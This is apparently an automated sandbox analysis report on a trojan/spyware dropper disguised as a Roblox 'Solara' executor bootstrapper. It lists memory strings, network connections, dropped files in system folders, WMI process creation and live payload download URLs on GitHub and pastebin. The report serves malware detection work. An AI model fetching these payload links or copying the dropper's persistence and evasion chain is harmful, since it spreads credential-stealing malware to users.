Source: powershell.exe, 00000020.00000002.2553387448.000001654C2E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DC27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891786000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166AC146000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F121A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1EA3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.nodejs.org
Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000020.00000002.2553387448.000001654C041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166ABF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF4B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F1217F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1E741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: BootstrapperV1.19.exe	String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientsettings.roblox.com
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE78C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: BootstrapperV1.19.exe	String found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getsolara.dev
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getsolara.dev/
Source: BootstrapperV1.19.exe	String found in binary or memory: https://getsolara.dev/Suspected
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getsolara.dev/X
Source: BootstrapperV1.19.exe	String found in binary or memory: https://getsolara.dev/api/endpoint.json
Source: BootstrapperV1.19.exe	String found in binary or memory: https://getsolara.dev/asset/discord.json
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw
Source: BootstrapperV1.19.exe	String found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c
Source: BootstrapperV1.19.exe	String found in binary or memory: https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw
Source: powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE78C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE78C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zip
Source: BootstrapperV1.19.exe	String found in binary or memory: https://github.com/zzzprojects/html-agility-pack/issues/513
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6FB000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE73B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ncs.roblox.com/upload
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6FB000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE737000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/pjseRvyK
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE692000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BootstrapperV1.19.exe	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nodejs.org
Source: BootstrapperV1.19.exe	String found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
Source: BootstrapperV1.19.exe	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 128.116.123.4:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.4:49735 version: TLS 1.2

Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Code function: 3_2_00D26FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

3_2_00D26FAA

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Windows\ELAMBKUP\SIHClient.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Windows\ELAMBKUP\7b3bf1de107bcf			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B811210	1_2_00007FFD9B811210
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B80C864	1_2_00007FFD9B80C864
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B800E88	1_2_00007FFD9B800E88
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B800DC8	1_2_00007FFD9B800DC8
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B800CA8	1_2_00007FFD9B800CA8
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B7FDA75	1_2_00007FFD9B7FDA75
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B800E90	1_2_00007FFD9B800E90
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Code function: 1_2_00007FFD9B800ED3	1_2_00007FFD9B800ED3
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D2848E	3_2_00D2848E
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D240FE	3_2_00D240FE
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D34088	3_2_00D34088
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D300B7	3_2_00D300B7
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D451C9	3_2_00D451C9
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D37153	3_2_00D37153
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D362CA	3_2_00D362CA
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D232F7	3_2_00D232F7
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D343BF	3_2_00D343BF
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D4D440	3_2_00D4D440
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D2F461	3_2_00D2F461
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D2C426	3_2_00D2C426
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D377EF	3_2_00D377EF
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D4D8EE	3_2_00D4D8EE
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D2286B	3_2_00D2286B
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D519F4	3_2_00D519F4
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D2E9B7	3_2_00D2E9B7
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D36CDC	3_2_00D36CDC
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D33E0B	3_2_00D33E0B
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D2EFE2	3_2_00D2EFE2
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D44F9A	3_2_00D44F9A
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BAB0D4B	13_2_00007FFD9BAB0D4B
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BAB0E43	13_2_00007FFD9BAB0E43
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEB51D2	13_2_00007FFD9BEB51D2
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEA7F48	13_2_00007FFD9BEA7F48
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Code function: 13_2_00007FFD9BEB446F	13_2_00007FFD9BEB446F

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: String function: 00D3EB78 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: String function: 00D3F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: String function: 00D3EC50 appears 56 times

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7152 -s 2180

Source: BootstrapperV1.19.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Source: BootstrapperV1.19.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows

Source: BootstrapperV1.19.exe, 00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs BootstrapperV1.19.exe
Source: BootstrapperV1.19.exe, 00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs BootstrapperV1.19.exe
Source: BootstrapperV1.19.exe, 00000000.00000003.1692821046.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs BootstrapperV1.19.exe
Source: BootstrapperV1.19.exe, 00000000.00000003.1695171822.0000000003269000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs BootstrapperV1.19.exe
Source: BootstrapperV1.19.exe, 00000001.00000000.1692761438.00000158AC776000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs BootstrapperV1.19.exe
Source: BootstrapperV1.19.exe	Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs BootstrapperV1.19.exe

Source: BootstrapperV1.19.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	Cryptographic APIs: 'CreateDecryptor'

Source: BootstrapperV1.19.exe	Binary or memory string: .sln
Source: BootstrapperV1.19.exe	Binary or memory string: .csproj.css
Source: BootstrapperV1.19.exe	Binary or memory string: .vbproj.vbs

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@86/345@5/6

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Code function: 3_2_00D26C74 GetLastError,FormatMessageW,

3_2_00D26C74

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Code function: 3_2_00D3A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

3_2_00D3A6C2

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe

File created: C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

File created: C:\Users\user\Desktop\DISCORD

Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7152
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-BLa09nxFf1DKMOkShfe9
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1508:120:WilError_03

Source: C:\Users\user\Desktop\BootstrapperV1.19.exe

File created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" "

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Command line argument: sfxname	3_2_00D3DF1E
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Command line argument: sfxstime	3_2_00D3DF1E
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Command line argument: STARTDLG	3_2_00D3DF1E

Source: BootstrapperV1.19.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\BootstrapperV1.19.exe

